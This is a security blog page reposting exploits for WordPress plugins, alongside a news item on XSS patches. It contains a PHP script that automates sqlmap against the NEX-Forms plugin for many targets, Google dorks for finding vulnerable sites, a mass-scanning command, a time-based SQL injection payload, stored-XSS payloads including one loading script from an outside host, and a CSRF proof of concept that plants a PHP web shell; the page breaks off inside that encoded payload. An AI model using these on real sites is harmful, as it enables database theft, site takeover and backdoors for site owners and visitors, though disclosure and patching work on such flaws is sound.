MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

24Apr/150

WordPress NEX-Forms 3.0 SQL Injection inurlbr

  # AUTOR SCRIPT:  Cleiton Pinheiro / Nick: googleINURL
  # Exploit name:  MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL
Injection Vulnerability
  # Type:          SQL Injection
  # Email:         inurlbr@gmail.com
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil
  # Who Discovered
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
  # Vulnerability discovered by: Claudio Viviani
 
 
 
# VENTOR
https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
 
# Vulnerability Description
The "submit_nex_form" ajax function is affected from SQL Injection
vulnerability
 
# Tool Description
Automation script explores targets with the help of SqlMap tool Execute
command SqlMap
 
{$params['folder']} -u
'{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1'
  --technique=B -p nex_forms_Id --dbms mysql {$params['proxy']}
--random-agent
  --answers='follow=N' --dbs --batch --time-sec 10 --level 2  --risk 1
 
# GET VULN
SQL can be injected in the following GET
 
GET VULN:     nex_forms_Id=(id)
$nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
Ex:
http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1
 
# XPL inject DBMS: 'MySQL'
 
Exploit:  AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
- GOOGLE DORK
 
inurl:nex-forms-express-wp-form-builder
index of nex-forms-express-wp-form-builde
# COMMAND --help:
 
    -t : SET TARGET.
    -f : SET FILE TARGETS.
    -p : SET PROXY
    Execute:
                  php wp3xplo1t.php -t target
                  php wp3xplo1t.php -f targets.txt
                  php wp3xplo1t.php -t target -p 'http://localhost:9090'
 
# EXPLOIT MASS USE SCANNER INURLBR
 
./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s
wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"
# DOWNLOAD INURLBR
 
https://github.com/googleinurl/SCANNER-INURLBR
 
# REFERENCE
[1] http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
 
EXPLOIT CODE:
 
<?php
 
/*
  [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]
 
-----------------------------------------------------------------------------
 
  # AUTOR SCRIPT:  Cleiton Pinheiro / Nick: googleINURL
  # Email:         inurlbr@gmail.com
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil
 
  # Who Discovered
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
  # Vulnerability discovered by: Claudio Viviani
 
-----------------------------------------------------------------------------
 
  # EXPLOIT NAME: MINI exploit-SQLMAP - WordPress NEX-Forms 3.0 SQL
Injection Vulnerability / INURL BRASIL
  # VENTOR:
https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
  # Dork Google:  inurl:nex-forms-express-wp-form-builder
  # Dork Google:  index of nex-forms-express-wp-form-builde
  # GET VULN:     nex_forms_Id=(id)
  # $nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
 
-----------------------------------------------------------------------------
 
  # DBMS: 'MySQL'
  # Exploit:       AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
 
 
-----------------------------------------------------------------------------
 
  # Info:         The "submit_nex_form" ajax function is affected from SQL
Injection vulnerability
  # POC:
http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=(id)+Exploit
 
-----------------------------------------------------------------------------
 
  # --help:
  -t : SET TARGET.
  -f : SET FILE TARGETS.
  -p : SET PROXY
  Execute:
  php wp3xplo1t.php -t target
  php wp3xplo1t.php -f targets.txt
  php wp3xplo1t.php -t target -p 'http://localhost:9090'
 
-----------------------------------------------------------------------------
 
  # EXPLOIT MASS USE SCANNER INURLBR
  # COMMAND: ./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder'
-s wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"
  # DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR
 
-----------------------------------------------------------------------------
  INFO:
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli/
 */
 
 
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
$folder_SqlMap = "sqlmap"; // set the folder! ex: python
../../sqlmap/sqlmap.py
$op_ = getopt('f:t:p:', array('help::'));
echo "
\t\t\t\t  _____
\t\t\t\t (_____)    ____ _   _ _    _ _____  _                 ____
       _ _
\t\t\t\t (() ())  |_   _| \ | | |  | |  __ \| |               |  _ \
       (_) |
\t\t\t\t  \   /     | | |  \| | |  | | |__) | |       ______  | |_) |_ __
__ _ ___ _| |
\t\t\t\t   \ /      | | | . ` | |  | |  _  /| |      |______| |  _ <| '__/
_` / __| | |
\t\t\t\t   /=\     _| |_| |\  | |__| | | \ \| |____           | |_) | | |
(_| \__ \ | |
\t\t\t\t  [___]   |_____|_| \_|\____/|_|  \_\______|          |____/|_|
 \__,_|___/_|_|
\t\t\t\t\033[1;37m0xNeither war between hackers, nor peace for the system.\n
\t\t\t\t[+] [Exploit]: MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL
Injection Vulnerability / INURL BRASIL\n\t\t\t\t[+] [help]:
 --help\033[0m\n\n";
$menu = "
\t\t\t\t    -t : SET TARGET.
\t\t\t\t    -f : SET FILE TARGETS.
\t\t\t\t    -p : SET PROXY
\t\t\t\t    Execute:
\t\t\t\t                  php wp3xplo1t.php -t target
\t\t\t\t                  php wp3xplo1t.php -f targets.txt
\t\t\t\t                  php wp3xplo1t.php -t target -p '
http://localhost:9090'
\n";
echo isset($op_['help']) ? exit($menu) : NULL;
 
$params = array(
    'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ?
$op_['t'] : "http://{$op_['t']}") : NULL,
    'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ?
$op_['f'] : NULL,
    'proxy' => not_isnull_empty($op_['p']) ? "--proxy '{$op_['p']}'" : NULL,
    'folder' => $folder_SqlMap,
    'line' =>
"\t\t\t\t--------------------------------------------------------------------------------------------------------"
);
 
not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ?
exit("\t\t\t\t[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;
not_isnull_empty($params['target']) ? __exec($params) . exit() : NULL;
not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;
 
function not_isnull_empty($valor = NULL) {
    RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
}
 
function __plus() {
    ob_flush();
    flush();
}
 
function __listTarget($file) {
    $tgt_ = array_unique(array_filter(explode("\n",
file_get_contents($file['file']))));
    echo "\n\033[1;37m[!] [" . date("H:i:s") . "] [INFO] TOTAL TARGETS
LOADED : " . count($tgt_) . "\033[0m\n";
    foreach ($tgt_ as $url) {
        echo "\033[1;37m[+] [" . date("H:i:s") . "] [INFO] SCANNING :
{$url} \033[0m\n";
        __plus();
        $file['target'] = $url;
        __exec($file) . __plus();
    }
}
 
function __exec($params) {
    __plus();
    echo "\033[1;37m{$params['line']}\n[!] [" . date("H:i:s") . "] [INFO]
starting SqlMap...\n";
    echo "[+] [" . date("H:i:s") . "] [INFO] TARGET:
{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id={SQL-INJECTION}\033[0m\n";
    $command = "{$params['folder']} -u
'{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1'
"
            . " -p nex_forms_Id --dbms mysql {$params['proxy']}
--random-agent "
            . " --answers='follow=N' --dbs --batch --time-sec 10 --level 2
 --risk 1";
    system($command, $dados);
    __plus();
    exit(0);
}

(21)

24Apr/150

WordPress NEX-Forms 3.0 SQL Injection SQLMAP

######################
 
# Exploit Title : NEX-Forms 3.0 SQL Injection Vulnerability
 
# Exploit Author : Claudio Viviani
 
# Website Author: http://www.homelab.it
                  http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
 
 
# Vendor Homepage : https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
 
# Software Link : https://downloads.wordpress.org/plugin/nex-forms-express-wp-form-builder.3.0.zip
 
# Dork Google: inurl:nex-forms-express-wp-form-builder
#              index of nex-forms-express-wp-form-builder
 
# Date : 2015-03-29
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
 
######################
 
# Info:
 
 The "submit_nex_form" ajax function is affected from SQL Injection vulnerability
 
 "nex_forms_Id" var is not sanitized
 
# PoC Exploit:
 
 http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
 
# Poc Video:
 
 http://youtu.be/04G08Cbrx1I
 
# PoC sqlmap:
 
 sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10" -p nex_forms_Id --dbms mysql
 
 [23:15:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
 [23:15:48] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
 for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
 [23:15:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
 [23:15:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
 [23:16:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
 [23:16:07] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive
 GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
 sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
 ---
 Parameter: nex_forms_Id (GET)
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)
 ---
 [23:16:34] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux CentOS 5.10
 web application technology: PHP 5.3.3, Apache 2.2.3
 back-end DBMS: MySQL 5.0.12
 
######################
 
# Vulnerability Disclosure Timeline:
 
2015-03-29:  Discovered vulnerability
2015-04-16:  Vendor Notification
2015-04-17:  Vendor Response/Feedback 
2015-04-21:  Vendor Send Fix/Patch (same version number)
2015-04-21:  Public Disclosure 
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
                http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
                http://ffhd.homelab.it (Free Fuzzy Hashes Database)
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################

(21)

24Apr/150

WordPress plugins susceptible to dangerous exploits

More than a dozen WordPress plugins have been updated to patch vulnerabilities that allow attackers to inject potentially dangerous commands into the browsers of people visiting trusted websites. Administrators responsible for WordPress sites should make sure the fixes are installed as soon as possible.

The cross-site scripting (XSS) vulnerabilities make it possible for hackers to concoct special address URLs that inject client-side code into vulnerable Web pages viewed by visitors. Exploits can steal highly sensitive authentication cookies, which give users access to their private accounts without having to enter a password. XSS attacks can also change the content inside a vulnerable Web page. Along with SQL injection exploits, XSS attacks are among the most common class of attacks carried out on the Internet.

In the past few days, more than a dozen WordPress plugins have been updated to purge XSS vulnerabilities. According to an advisory published by Web application security firm Sucuri, they are:

Jetpack
WordPress SEO
Google Analytics by Yoast
All In one SEO
Gravity Forms
Multiple Plugins from Easy Digital Downloads
UpdraftPlus
WP-E-Commerce
WPTouch
Download Monitor
Related Posts for WordPress
My Calendar
P3 Profiler
Give
Multiple iThemes products including Builder and Exchange
Broken-Link-Checker
Ninja Forms

The vulnerabilities are the result of developers who misused two widely used programming functions that modify or add query strings to URLs, specifically add_query_arg() and remove_query_arg(). Many developers mistakenly assumed the functions would "escape," or sanitize user input so it's safe to use. In fact they don't. For the functions to escape user input, they must be followed by functions such as esc_url() or esc_url_raw(). The WordPress developer team has more guidance here.

The plugins listed above were updated as part of a coordinated response following a blog post from last week that brought the XSS attack hole to light. Sucuri and others then analyzed the top 300 or so plugins and notified developers of those plugins found to be vulnerable. WordPress admins who use any of them should ensure they have been updated in the past few days to patch the bug. It's likely that additional WordPress plugins remain vulnerable, so admins should scrutinize all plugins running on their site to make sure they aren't susceptible to the same types of attacks.

Fonte: http://arstechnica.com/security/2015/04/swarm-of-wordpress-plugins-susceptible-to-potentially-dangerous-exploits/ (50)

Inserito in: SICUREZZA Nessun commento
23Apr/150

WordPress Add Link to Facebook Stored Cross Site Scripting

Title: Stored XSS Vulnerability in Add Link to Facebook Wordpress Plugin
 
Author: Rohit Kumar
 
Plugin Homepage: http://wordpress.org/extend/plugins/add-link-to-facebook/
 
Severity: Medium
 
Version Affected: Version 1.215 and mostly prior to it.
 
Version Tested: Version 1.215
 
Version Patched : 1.215
 
Description:
 
Vulnerable Parameter
1. App ID
2. App Secret
3. Custom Picture URL
4. Default Picture URL
5. URL News Feed Icon
 
About Vulnerability
This plugin is vulnerable to Stored Cross Site Scripting Vulnerability. This issue was exploited when user
accessed to “Add Link to Facebook” Settings in Wordpress with Administrator privileges. A malicious
administrator can hijack other user’s sessions, take control of another administrator’s browser or install
malware on their computer.
 
Vulnerability Class:
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
 
Steps to Reproduce:
After installing the plugin:
&#61623; Goto Settings &#61664;All in One Facebook
&#61623; Input this payload in “App ID” :- “><script>alert(1)</script>
&#61623; Click on the Save button.
&#61623; After reloading the page you will see a Pop Up Box with 1 written on it.
&#61623; Reload the page again to make sure it’s stored.
 
Change Log
https://wordpress.org/plugins/add-link-to-facebook/changelog/
 
Disclosure
09th March 2015

(327)

22Apr/150

WordPress WP Statistics 9.1.2 Cross Site Scripting

===========================================================
Stored XSS Vulnerability in WP Statistics  Wordpress Plugin 
===========================================================
 
. contents:: Table Of Content
 
Overview
========
 
* Title :Stored XSS Vulnerability in WP Statistics Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/wp-statistics/
* Severity: Medium
* Version Affected: 9.1.2 and mostly prior to it
* Version Tested : 9.1.2
* version patched: 9.1.3
 
Description 
===========
 
Vulnerable Parameter  
--------------------
 
*  Check for online users every:
*  Coefficient per visitor:
 
 
About Vulnerability
-------------------
This plugin is vulnerable to a Stored cross site scripting vulnerability,This issue was exploited when administrator users with access to WP Statistics Setting in wordpress Above Vulbnerable parameter is vulnerable for stored XSS. A malicious administration can hijack other users session, take control of another administrator's browser or install malware on their computer.
 
Vulnerability Class
===================     
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) 
 
Steps to Reproduce: (POC)
=========================
 
After installing the plugin
 
* Goto settings --> WP Statistics
* Put This payload in any above vulnerable parameter <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
* Click on the Save Changes you will see XSS in action 
* Reload the page or re navigate to page to make sure its stored ;)
 
Mitigation 
==========
Update to 9.1.3
 
Change Log
==========
https://wordpress.org/plugins/wp-statistics/changelog/
 
Disclosure 
==========
14-April-2015 reported to developer
15-April-2015 Fix by developer
15-April-2015 Public Disclosure
credits
=======
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

(66)

22Apr/150

WordPress MiwoFTP 1.0.5 CSRF Command Execution

WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Creation Exploit (RCE)
 
 
Vendor: Miwisoft LLC
Product web page: http://www.miwisoft.com
Affected version: 1.0.5
 
Summary: MiwoFTP is a smart, fast and lightweight file manager
plugin that operates from the back-end of WordPress.
 
Desc: MiwoFTP WP Plugin suffers from a cross-site request forgery
remote code execution vulnerability. The application allows users
to perform certain actions via HTTP requests without performing any
validity checks to verify the requests. This can be exploited to
perform certain actions like executing arbitrary PHP code by uploading
a malicious PHP script file, with administrative privileges, if a
logged-in user visits a malicious web site.
 
Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21
 
 
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience
 
 
Advisory ID: ZSL-2015-5242
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5242.php
 
Vendor: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog
 
 
24.03.2015
 
--
 
 
RCE CSRF PoC for masqueraded payload for admin view when editing:
Logic error:
When admin clicks on malicious link the plugin will:
 
1. Search existing file for edit: action=edit&dir=/&item=wp-comments-post.php.
2. In the root folder of WP, file wp-comments.php is created.
3. Payload is an excerpt from wp-comments-post.php without '<?php' part (SE+HTMLenc).
4. Somewhere below in that code, the evil payload: <?php system($_GET['c']); ?> is inserted.
5. Admin is presented with interface of editing wp-comments.php with contents from wp-comments-post.php.
6. After that, no matter what admin clicks (CSRF) (Save, Reset or Close), backdoor file is created (wp-comments.php).
7. Attacker executes code, ex: http://localhost/wordpress/wp-comments.php?c=whoami
 
 
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=edit&dir=/&item=wp-comments-post.php&order=name&srt=yes" method="POST">
      <input type="hidden" name="dosave" value="yes" />
      <input type="hidden" name="code" value="&#x2f;&#x2a;&#x2a;&#x0a;&#x20;&#x2a;&#x20;&#x48;&#x61;&#x6e;&#x64;&#x6c;&#x65;&#x73;&#x20;&#x43;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x20;&#x50;&#x6f;&#x73;&#x74;&#x20;&#x74;&#x6f;&#x20;&#x57;&#x6f;&#x72;&#x64;&#x50;&#x72;&#x65;&#x73;&#x73;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x70;&#x72;&#x65;&#x76;&#x65;&#x6e;&#x74;&#x73;&#x20;&#x64;&#x75;&#x70;&#x6c;&#x69;&#x63;&#x61;&#x74;&#x65;&#x20;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x20;&#x70;&#x6f;&#x73;&#x74;&#x69;&#x6e;&#x67;&#x2e;&#x0a;&#x20;&#x2a;&#x0a;&#x20;&#x2a;&#x20;&#x40;&#x70;&#x61;&#x63;&#x6b;&#x61;&#x67;&#x65;&#x20;&#x57;&#x6f;&#x72;&#x64;&#x50;&#x72;&#x65;&#x73;&#x73;&#x0a;&#x20;&#x2a;&#x2f;&#x0a;&#x0a;&#x69;&#x66;&#x20;&#x28;&#x20;&#x27;&#x50;&#x4f;&#x53;&#x54;&#x27;&#x20;&#x21;&#x3d;&#x20;&#x24;&#x5f;&#x53;&#x45;&#x52;&#x56;&#x45;&#x52;&#x5b;&#x27;&#x52;&#x45;&#x51;&#x55;&#x45;&#x53;&#x54;&#x5f;&#x4d;&#x45;&#x54;&#x48;&#x4f;&#x44;&#x27;&#x5d;&#x20;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x68;&#x65;&#x61;&#x64;&#x65;&#x72;&#x28;&#x27;&#x41;&#x6c;&#x6c;&#x6f;&#x77;&#x3a;&#x20;&#x50;&#x4f;&#x53;&#x54;&#x27;&#x29;&#x3b;&#x0a;&#x09;&#x68;&#x65;&#x61;&#x64;&#x65;&#x72;&#x28;&#x27;&#x48;&#x54;&#x54;&#x50;&#x2f;&#x31;&#x2e;&#x31;&#x20;&#x34;&#x30;&#x35;&#x20;&#x4d;&#x65;&#x74;&#x68;&#x6f;&#x64;&#x20;&#x4e;&#x6f;&#x74;&#x20;&#x41;&#x6c;&#x6c;&#x6f;&#x77;&#x65;&#x64;&#x27;&#x29;&#x3b;&#x0a;&#x09;&#x68;&#x65;&#x61;&#x64;&#x65;&#x72;&#x28;&#x27;&#x43;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x2d;&#x54;&#x79;&#x70;&#x65;&#x3a;&#x20;&#x74;&#x65;&#x78;&#x74;&#x2f;&#x70;&#x6c;&#x61;&#x69;&#x6e;&#x27;&#x29;&#x3b;&#x0a;&#x09;&#x65;&#x78;&#x69;&#x74;&#x3b;&#x0a;&#x7d;&#x0a;&#x0a;&#x2f;&#x2a;&#x2a;&#x20;&#x53;&#x65;&#x74;&#x73;&#x20;&#x75;&#x70;&#x20;&#x74;&#x68;&#x65;&#x20;&#x57;&#x6f;&#x72;&#x64;&#x50;&#x72;&#x65;&#x73;&#x73;&#x20;&#x45;&#x6e;&#x76;&#x69;&#x72;&#x6f;&#x6e;&#x6d;&#x65;&#x6e;&#x74;&#x2e;&#x20;&#x2a;&#x2f;&#x0a;&#x72;&#x65;&#x71;&#x75;&#x69;&#x72;&#x65;&#x28;&#x20;&#x64;&#x69;&#x72;&#x6e;&#x61;&#x6d;&#x65;&#x28;&#x5f;&#x5f;&#x46;&#x49;&#x4c;&#x45;&#x5f;&#x5f;&#x29;&#x20;&#x2e;&#x20;&#x27;&#x2f;&#x77;&#x70;&#x2d;&#x6c;&#x6f;&#x61;&#x64;&#x2e;&#x70;&#x68;&#x70;&#x27;&#x20;&#x29;&#x3b;&#x0a;&#x0a;&#x6e;&#x6f;&#x63;&#x61;&#x63;&#x68;&#x65;&#x5f;&#x68;&#x65;&#x61;&#x64;&#x65;&#x72;&#x73;&#x28;&#x29;&#x3b;&#x0a;&#x0a;&#x24;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x20;&#x3d;&#x20;&#x69;&#x73;&#x73;&#x65;&#x74;&#x28;&#x24;&#x5f;&#x50;&#x4f;&#x53;&#x54;&#x5b;&#x27;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x27;&#x5d;&#x29;&#x20;&#x3f;&#x20;&#x28;&#x69;&#x6e;&#x74;&#x29;&#x20;&#x24;&#x5f;&#x50;&#x4f;&#x53;&#x54;&#x5b;&#x27;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x27;&#x5d;&#x20;&#x3a;&#x20;&#x30;&#x3b;&#x0a;&#x0a;&#x24;&#x70;&#x6f;&#x73;&#x74;&#x20;&#x3d;&#x20;&#x67;&#x65;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x28;&#x24;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x29;&#x3b;&#x0a;&#x0a;&#x69;&#x66;&#x20;&#x28;&#x20;&#x65;&#x6d;&#x70;&#x74;&#x79;&#x28;&#x20;&#x24;&#x70;&#x6f;&#x73;&#x74;&#x2d;&#x3e;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x20;&#x29;&#x20;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x2f;&#x2a;&#x2a;&#x0a;&#x09;&#x20;&#x2a;&#x20;&#x46;&#x69;&#x72;&#x65;&#x73;&#x20;&#x77;&#x68;&#x65;&#x6e;&#x20;&#x61;&#x20;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x20;&#x69;&#x73;&#x20;&#x61;&#x74;&#x74;&#x65;&#x6d;&#x70;&#x74;&#x65;&#x64;&#x20;&#x6f;&#x6e;&#x20;&#x61;&#x20;&#x70;&#x6f;&#x73;&#x74;&#x20;&#x74;&#x68;&#x61;&#x74;&#x20;&#x64;&#x6f;&#x65;&#x73;&#x20;&#x6e;&#x6f;&#x74;&#x20;&#x65;&#x78;&#x69;&#x73;&#x74;&#x2e;&#x0a;&#x09;&#x20;&#x2a;&#x0a;&#x09;&#x20;&#x2a;&#x20;&#x40;&#x73;&#x69;&#x6e;&#x63;&#x65;&#x20;&#x31;&#x2e;&#x35;&#x2e;&#x30;&#x0a;&#x09;&#x20;&#x2a;&#x0a;&#x09;&#x20;&#x2a;&#x20;&#x40;&#x70;&#x61;&#x72;&#x61;&#x6d;&#x20;&#x69;&#x6e;&#x74;&#x20;&#x24;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x20;&#x50;&#x6f;&#x73;&#x74;&#x20;&#x49;&#x44;&#x2e;&#x0a;&#x09;&#x20;&#x2a;&#x2f;&#x0a;&#x09;&#x64;&#x6f;&#x5f;&#x61;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x28;&#x20;&#x27;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x69;&#x64;&#x5f;&#x6e;&#x6f;&#x74;&#x5f;&#x66;&#x6f;&#x75;&#x6e;&#x64;&#x27;&#x2c;&#x20;&#x24;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x20;&#x29;&#x3b;&#x0a;&#x09;&#x65;&#x78;&#x69;&#x74;&#x3b;&#x0a;&#x7d;&#x0a;&#x0a;&#x2f;&#x2f;&#x20;&#x67;&#x65;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x28;&#x29;&#x20;&#x77;&#x69;&#x6c;&#x6c;&#x20;&#x67;&#x65;&#x74;&#x20;&#x74;&#x68;&#x65;&#x20;&#x70;&#x61;&#x72;&#x65;&#x6e;&#x74;&#x20;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x20;&#x66;&#x6f;&#x72;&#x20;&#x61;&#x74;&#x74;&#x61;&#x63;&#x68;&#x6d;&#x65;&#x6e;&#x74;&#x73;&#x2e;&#x0a;&#x24;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x20;&#x3d;&#x20;&#x67;&#x65;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x28;&#x24;&#x70;&#x6f;&#x73;&#x74;&#x29;&#x3b;&#x0a;&#x0a;&#x24;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x5f;&#x6f;&#x62;&#x6a;&#x20;&#x3d;&#x20;&#x67;&#x65;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x5f;&#x6f;&#x62;&#x6a;&#x65;&#x63;&#x74;&#x28;&#x24;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x29;&#x3b;&#x0a;&#x0a;&#x69;&#x66;&#x20;&#x28;&#x20;&#x21;&#x20;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x73;&#x5f;&#x6f;&#x70;&#x65;&#x6e;&#x28;&#x20;&#x24;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x20;&#x29;&#x20;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x2f;&#x2a;&#x2a;&#x0a;&#x09;&#x20;&#x2a;&#x20;&#x46;&#x69;&#x72;&#x65;&#x73;&#x20;&#x77;&#x68;&#x65;&#x6e;&#x20;&#x61;&#x20;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x20;&#x69;&#x73;&#x20;&#x61;&#x74;&#x74;&#x65;&#x6d;&#x70;&#x74;&#x65;&#x64;&#x20;&#x6f;&#x6e;&#x20;&#x61;&#x20;&#x70;&#x6f;&#x73;&#x74;&#x20;&#x74;&#x68;&#x61;&#x74;&#x20;&#x68;&#x61;&#x73;&#x20;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x73;&#x20;&#x63;&#x6c;&#x6f;&#x73;&#x65;&#x64;&#x2e;&#x0a;&#x09;&#x20;&#x2a;&#x0a;&#x09;&#x20;&#x2a;&#x20;&#x40;&#x73;&#x69;&#x6e;&#x63;&#x65;&#x20;&#x31;&#x2e;&#x35;&#x2e;&#x30;&#x0a;&#x09;&#x20;&#x2a;&#x0a;&#x09;&#x20;&#x2a;&#x20;&#x40;&#x70;&#